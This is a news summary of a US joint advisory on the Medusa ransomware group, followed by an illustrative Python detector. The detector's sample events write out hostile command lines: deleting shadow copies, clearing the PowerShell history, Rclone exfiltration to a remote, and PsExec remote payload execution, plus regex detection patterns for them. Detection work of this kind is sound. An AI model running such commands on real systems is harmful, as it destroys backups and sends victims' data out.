Critical Infrastructure Entities Warned About Medusa Ransomware as Victim Count Hits 300
A warning has been issued about the Medusa ransomware-as-a-service (RaaS) group, which has now claimed more than 300 victims in critical infrastructure sectors including healthcare, education, and manufacturing. The group has been active since June 2021 when it started as a closed group, before adopting the RaaS model, where affiliates are recruited to conduct attacks for a percentage of any ransom payments they generate.
Around two years after the group formed, Medusa launched a data leak site where victims are named and stolen data is published if the ransom is not paid. This double extortion method, where the ransom must be paid to obtain the decryption keys and prevent the publication of stolen data, is common among RaaS groups, although in the case of Medusa, its core members have retained control of ransom negotiations.
According to the joint cybersecurity alert from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), the Medusa developers recruit initial access brokers (IABs) on cybercriminal forums and marketplaces and incentivize them to work solely with Medusa. The authoring agencies have observed affiliates using phishing to obtain credentials to access victims’ networks, as well as exploiting unpatched software vulnerabilities, including last year’s ScreenConnect vulnerability CVE-2024-1709 and the Fortinet EMS SQL injection vulnerability CVE-2023-48788.
Once access to a victim’s network has been gained, Medusa actors use living off the land techniques for user, system, network, and file system enumeration, including legitimate tools such as Advanced IP Scanner, SoftPerfect Network Scanner, PowerShell, Windows Command Prompt, and Ingress Tool Transfer capabilities, as well as Windows Management Instrumentation (WMI) for querying system information.
The authoring agencies have observed Medusa actors using several different PowerShell detection evasion techniques, and they are known to hide their activities by deleting the PowerShell command line history. Endpoint detection and response tools are disabled by using vulnerable or signed drivers to kill processes, and legitimate remote access software is often used to evade detection and assist with lateral movement, along with Remote Desktop Protocol (RDP) and PsExec. Rclone is used to facilitate data exfiltration, and the encryptor is deployed across the network using tools such as Sysinternals PsExec, PDQ Deploy, and BigFix. Windows Defender and other security tools are also disabled on specific targets, backup processes are terminated, and shadow copies are deleted to prevent restoration of encrypted files without paying the ransom. Victims are given 48 hours to make contact to negotiate the ransom payment, with Medusa actors also known to reach out to victims via phone or email. There has been at least one instance where a further ransom demand was issued after the initial payment was made, where the affiliate behind the attack claimed not to have been paid.
The cybersecurity alert shares indicators of compromise (IOCs), known MITRE ATT&CK tactics and techniques, and recommended mitigations. The most important mitigations are: patching known vulnerabilities promptly; segmenting networks to restrict lateral movement; filtering network traffic so that unknown or untrusted origins cannot reach remote services on internal systems; implementing multifactor authentication for webmail, VPNs, and all accounts that access critical systems; and educating the workforce to recognize and avoid phishing.
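Several of the post-access behaviours described above (shadow copy deletion, clearing of the PowerShell history, Rclone exfiltration and PsExec-driven deployment) leave distinctive process command lines, so they can be flagged from process-creation telemetry. The following detector is an added illustration, not code from the advisory or from HIPAA Journal; the events are constructed to resemble Sysmon Event ID 1 / Windows 4688 fields, and the host names, paths and `payload.exe` file name are placeholders.

```python
"""Toy command-line detector for host behaviours named in the Medusa advisory
summary. Constructed sample events only; not real telemetry."""
import re

# Constructed process-creation events (hosts, paths and file names are placeholders).
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Remove-Item (Get-PSReadlineOption).HistorySavePath"},
    {"host": "fs-02", "image": r"C:\Users\svc\AppData\Local\Temp\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Shares\\Finance remote:backup --transfers 32"},
    {"host": "dc-01", "image": r"C:\Tools\PsExec.exe",
     "cmdline": "PsExec.exe \\\\ws-01 -s -d cmd /c C:\\temp\\payload.exe"},
    {"host": "ws-03", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\a\\notes.txt"},  # benign control event
]

# (rule name, pattern on the command line). Each rule maps to a behaviour the
# advisory summary attributes to Medusa actors.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("powershell_history_clearing",
     re.compile(r"Clear-History|ConsoleHost_history|HistorySavePath", re.I)),
    ("rclone_exfil",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("psexec_remote_exec",
     re.compile(r"psexec(\.exe)?\s+\\\\", re.I)),  # PsExec invoked against a remote host
]


def classify(event):
    """Return the names of all rules whose pattern matches the event's command line."""
    return [name for name, pattern in RULES if pattern.search(event["cmdline"])]


def scan(events):
    """Return one (host, rule, cmdline) alert per matching rule across all events."""
    return [(ev["host"], rule, ev["cmdline"]) for ev in events for rule in classify(ev)]


if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {cmd}")
```

In production the same patterns belong in a Sigma rule or EDR query rather than a script, and a single hit on shadow copy deletion or Defender being disabled on a specific host is worth treating as a probable pre-encryption step rather than an informational event.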


